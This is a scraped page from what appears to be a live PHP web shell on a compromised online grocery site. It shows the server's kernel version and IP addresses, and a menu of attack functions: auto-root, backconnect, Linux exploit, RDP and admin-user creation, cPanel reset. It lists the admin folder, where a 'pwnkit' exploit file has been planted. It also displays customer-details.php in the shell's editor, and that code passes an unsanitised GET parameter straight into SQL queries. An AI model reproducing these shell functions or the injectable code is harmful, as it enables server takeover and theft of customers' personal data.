Linux server.hostify.co.in 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
Apache
: 162.214.74.213 | : 216.73.217.79
438 Domain
8.2.31
orangegroceries
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
orangegroceries /
public_html /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
assest
[ DIR ]
drwxr-xr-x
banner
[ DIR ]
drwxr-xr-x
ckeditor
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
product
[ DIR ]
drwxr-xr-x
aboutuscms.php
2.86
KB
-rw-r--r--
add-ads.php
7.15
KB
-rw-r--r--
add-brand.php
7.43
KB
-rw-r--r--
add-delivery-employee.php
17.68
KB
-rw-r--r--
add-employee.php
17.84
KB
-rw-r--r--
add-product.php
19.45
KB
-rw-r--r--
add-testimonial.php
4.18
KB
-rw-r--r--
admin.php
5.23
KB
-rw-r--r--
ajax_get_subcat.php
1.32
KB
-rw-r--r--
ajax_get_subsub_cat.php
1.31
KB
-rw-r--r--
all_product_delete.php
258
B
-rw-r--r--
assign-page.php
3.66
KB
-rw-r--r--
balance-sheet.php
6.43
KB
-rw-r--r--
banner.php
7.4
KB
-rw-r--r--
category.php
17.53
KB
-rw-r--r--
checkout-ads.php
3.7
KB
-rw-r--r--
checkout.php
23.41
KB
-rw-r--r--
customer-details.php
11.73
KB
-rw-r--r--
customer.php
4.2
KB
-rw-r--r--
dashboard.php
3.31
KB
-rw-r--r--
delete_ads.php
284
B
-rw-r--r--
delete_banner.php
282
B
-rw-r--r--
delete_brand.php
284
B
-rw-r--r--
delete_category.php
1.81
KB
-rw-r--r--
delete_customer.php
291
B
-rw-r--r--
delete_enquiry.php
288
B
-rw-r--r--
delete_ordprd.php
541
B
-rw-r--r--
delete_prd.php
292
B
-rw-r--r--
delete_product.php
1.49
KB
-rw-r--r--
delete_promo.php
290
B
-rw-r--r--
delete_subcategory.php
2.03
KB
-rw-r--r--
delete_subsubcategory.php
2.64
KB
-rw-r--r--
delete_testimonial.php
292
B
-rw-r--r--
department.php
3.71
KB
-rw-r--r--
designation.php
4.8
KB
-rw-r--r--
edit-assign-page.php
3.71
KB
-rw-r--r--
edit-product-details.php
24.8
KB
-rw-r--r--
edit_adstop.php
299
B
-rw-r--r--
edit_banner.php
300
B
-rw-r--r--
edit_brand.php
295
B
-rw-r--r--
edit_category.php
302
B
-rw-r--r--
edit_subcat.php
505
B
-rw-r--r--
edit_subsubcat.php
571
B
-rw-r--r--
enquiry-now.php
2.75
KB
-rw-r--r--
footer_content.php
2.89
KB
-rw-r--r--
get_prod_details.php
308
B
-rw-r--r--
home-ads.php
3.71
KB
-rw-r--r--
index.php
3.16
KB
-rw-r--r--
invoice.php
17.36
KB
-rw-r--r--
privacy.php
2.96
KB
-rw-r--r--
product-details.php
2.71
KB
-rw-r--r--
product-order-details.php
5.62
KB
-rw-r--r--
products.php
9.17
KB
-rw-r--r--
promo-code.php
5.64
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
return_policy.php
2.83
KB
-rw-r--r--
shipping_policy.php
2.87
KB
-rw-r--r--
status_update.php
337
B
-rw-r--r--
sub-category.php
20.11
KB
-rw-r--r--
sub-sub-category.php
24.04
KB
-rw-r--r--
term_condition.php
2.83
KB
-rw-r--r--
view-product-details.php
15.13
KB
-rw-r--r--
view-product-order-detail.php
11.2
KB
-rw-r--r--
view_pages.php
3.55
KB
-rw-r--r--
whatsapp-ads.php
3.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : customer-details.php
<?php include("includes/db_config.php"); $id=$_GET['id']; $sqlid="select * from user_profile where id='$id'"; $result = mysqli_query($conn, $sqlid); $res= mysqli_fetch_array($result); $country=$res['country']; $state=$res['state']; $city=$res['city']; $sql_country = mysqli_query($conn,"select * from countries where id = '$country'"); $row_country = mysqli_fetch_array($sql_country); $sql_state = mysqli_query($conn,"select * from states where id = '$state'"); $row_state = mysqli_fetch_array($sql_state); $sql_city = mysqli_query($conn,"select * from cities where id = '$city'"); $row_city = mysqli_fetch_array($sql_city); $shp_country=$res['shp_country']; $shp_state=$res['shp_state']; $shp_city=$res['shp_city']; $sql_country = mysqli_query($conn,"select * from countries where id = '$shp_country'"); $s_country = mysqli_fetch_array($sql_country); $sql_state = mysqli_query($conn,"select * from states where id = '$shp_state'"); $s_state = mysqli_fetch_array($sql_state); $sql_city = mysqli_query($conn,"select * from cities where id = '$shp_city'"); $s_city = mysqli_fetch_array($sql_city);?> <!DOCTYPE html> <html lang="en-IN"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Orange Groceries</title> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport"> <?php include("includes/css.php")?> </head> <body class="hold-transition skin-blue sidebar-mini"> <div class="wrapper"> <?php include("includes/header.php");?> <?php include("includes/sidebar.php");?> <div class="content-wrapper"> <!-- Content Header (Page header) --> <section class="content-header"> <h1> Dashboard <small>Control panel</small> </h1> <ol class="breadcrumb"> <li><a href="index.php"><i class="fa fa-dashboard"></i> Home</a></li> <li class="active">Dashboard</li> </ol> </section> <!-- Main content --> <section class="content"> <div class="row"> <div class="col-md-3"> <!-- Profile Image --> <div class="box box-danger"> <div class="box-body box-profile"> <img class="profile-user-img img-responsive img-circle" src="profile-image/<?php echo $res['prof_img']; ?>" alt="User profile picture"> <h3 class="profile-username text-center">Mr. <?php echo $res['fname']." ".$res['lname']; ?></h3> <ul class="list-group list-group-unbordered"> <li class="list-group-item"> <b>Phone</b> <a class="pull-right"><?php echo $res['mob_no']; ?></a> </li> <li class="list-group-item"> <b>Email</b> <a class="pull-right"><?php echo $res['email']; ?></a> </li> </ul> </div> <!-- /.box-body --> </div> <!-- /.box --> </div> <div class="col-xs-9"> <div class="box box-danger"> <div class="box-header"> <div class="row"> <div class="col-md-9"> <h3 class="box-title">Edit Customer Details</h3> </div> <!-- <div class="col-md-3"><a href="add-Customer.php"><button class="btn btn-flat btn-custom2 btn-block"><i class="fa fa-plus"></i> Add New Customer</button></a></div> --> </div> </div> <div class="box-body"> <div class="nav-tabs-custom"> <ul class="nav nav-tabs nav-justified"> <li class="active"><a href="#tab_1" data-toggle="tab">Profile </a></li> <!-- <li><a href="#tab_2" data-toggle="tab"> Edit Profile </a></li> --> </ul> <div class="tab-content"> <div class="tab-pane active" id="tab_1"> <div class="row"> <div class="col-md-6"> <div class="form-group"> <label for="full_name">Name</label> <input class="form-control" placeholder="Full Name" name="full_name" type="text" value="<?php echo $res['fname']." ".$res['fname']; ?>" readonly> </div> </div> <div class="col-md-6"> <div class="form-group"> <label for="email" class="control-label">Email</label> <input class="form-control" placeholder="Email" name="email" type="text" value="<?php echo $res['email']; ?>" readonly> </div> </div> <div class="col-md-6"> <div class="form-group"> <label for="contact_no" class="control-label">Contact Number</label> <input class="form-control" placeholder="Contact Number" name="contact_no" type="text" value="<?php echo $res['mob_no']; ?>" readonly> </div> </div> <div class="col-md-6"> <div class="form-group"> <label for="permanentaddress">Customer Permanent Address</label> <textarea class="form-control" placeholder="Enter Your Permanent Address" name="permanentaddress" cols="30" rows="4" id="address" readonly><?php $addr= $res['addr'].", ".$row_city['name'].", ".$row_state['name'].", ".$row_country['name'].", ".$res['pincode']; echo $addr; ?></textarea> </div> </div> <div class="col-md-6"> <div class="form-group"> <label for="permanentaddress">Customer Shipping Address</label> <textarea class="form-control" placeholder="Enter Your Permanent Address" name="permanentaddress" cols="30" rows="4" id="address" readonly><?php $addr= $res['shp_addr'].", ".$s_city['name'].", ".$s_city['name'].", ".$s_state['name'].", ".$s_country['name'].", ".$res['shp_pincode']; echo $addr; ?></textarea> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="pic">Photo</label><br /> <div class="dppicbrowse"><img src="img/profile/<?php echo $res['prof_img']; ?>" style="height:120px;" alt="your image" class="img-responsive" /> </div> </div> </div> </div> </div> <!-- /.tab-pane --> <div class="tab-pane" id="tab_2"> <form action="" autocomplete="off" method="post" accept-charset="utf-8"> <div class="row"> <div class="form-group"> <div class="col-md-6"> <label for="full_name">Name</label> <input class="form-control" placeholder="Full Name" name="full_name" type="text" value=""> </div> <div class="col-md-6"> <label for="emp_id">Customer-ID</label> <input class="form-control" placeholder="Customer ID" name="emp_id" type="text" value="MMG-EMP001" readonly> </div> <div class="col-md-6"> <label for="email" class="control-label">Email</label> <input class="form-control" placeholder="Email" name="email" type="text" value="abc@gmail.in" readonly> </div> <div class="col-md-6"> <label for="contact_no" class="control-label">Contact Number</label> <input class="form-control" placeholder="Contact Number" name="contact_no" type="text" value="+91-9876543210"> </div> <div class="clearfix"></div> <h4>Present Address</h4> <div class="col-md-6"> <label for="address">Your Address</label> <textarea class="form-control" placeholder="Enter Your Address eg. 101, Near central mall" name="address" rows="2" id="address"></textarea> </div> <div class="col-md-6"> <label for="State">Select State</label> <select class="form-control" name="state"> <option value=""> -- Select State --</option> <option value="Telangana"> Telangana</option> <option value="Maharashtra"> Maharashtra</option> <option value="Tamil Nadu"> Tamil Nadu</option> <option value="Other">Other</option> </select> </div> <div class="clearfix"></div> <div class="col-md-6"> <label for="City">Select City</label> <select class="form-control" name="City"> <option value=""> -- Select City --</option> <option value="Hyderabad"> Hyderabad</option> <option value="Warangal"> Warangal</option> <option value="Other">Other</option> </select> </div> <div class="col-md-6"> <label for="pcode">Pin Code</label> <input class="form-control" placeholder="Enter Pin Code" name="pcode" type="text" value=""> </div> <div class="clearfix"></div> <h4>Shipping Address</h4> <div class="col-md-6"> <label for="address">Your Address</label> <textarea class="form-control" placeholder="Enter Your Address eg. 101, Near central mall" name="address" rows="2" id="address"></textarea> </div> <div class="col-md-6"> <label for="State">Select State</label> <select class="form-control" name="state"> <option value=""> -- Select State --</option> <option value="Telangana"> Telangana</option> <option value="Maharashtra"> Maharashtra</option> <option value="Tamil Nadu"> Tamil Nadu</option> <option value="Other">Other</option> </select> </div> <div class="clearfix"></div> <div class="col-md-6"> <label for="City">Select City</label> <select class="form-control" name="City"> <option value=""> -- Select City --</option> <option value="Hyderabad"> Hyderabad</option> <option value="Warangal"> Warangal</option> <option value="Other">Other</option> </select> </div> <div class="col-md-6"> <label for="pcode">Pin Code</label> <input class="form-control" placeholder="Enter Pin Code" name="pcode" type="text" value=""> </div> </div> <div class="col-md-6 mt-20"> <div class="form-actions"> <button type="submit" name="submit" id="submit" class="btn btn-success btn-lg"><i class="fa fa fa-check-square-o"></i> Update</button> </div> </div> </div> </form> </div> </div> </div> </div> </div> </div> </div> </section> <!-- /.content --> </div> <!-- /.content-wrapper --> <?php include("includes/footer.php");?> <div class="control-sidebar-bg"></div> </div> <?php include("includes/js.php");?> <script> function readURL(input) { if (input.files && input.files[0]) { var reader = new FileReader(); reader.onload = function(e) { $('#picuser') .attr('src', e.target.result); }; reader.readAsDataURL(input.files[0]); } } function read1URL(input) { if (input.files && input.files[0]) { var reader = new FileReader(); reader.onload = function(e) { $('#adhharcard') .attr('src', e.target.result); }; reader.readAsDataURL(input.files[0]); } } function read2URL(input) { if (input.files && input.files[0]) { var reader = new FileReader(); reader.onload = function(e) { $('#pancards') .attr('src', e.target.result); }; reader.readAsDataURL(input.files[0]); } } function read3URL(input) { if (input.files && input.files[0]) { var reader = new FileReader(); reader.onload = function(e) { $('#gstin') .attr('src', e.target.result); }; reader.readAsDataURL(input.files[0]); } } </script> </body> </html>
Close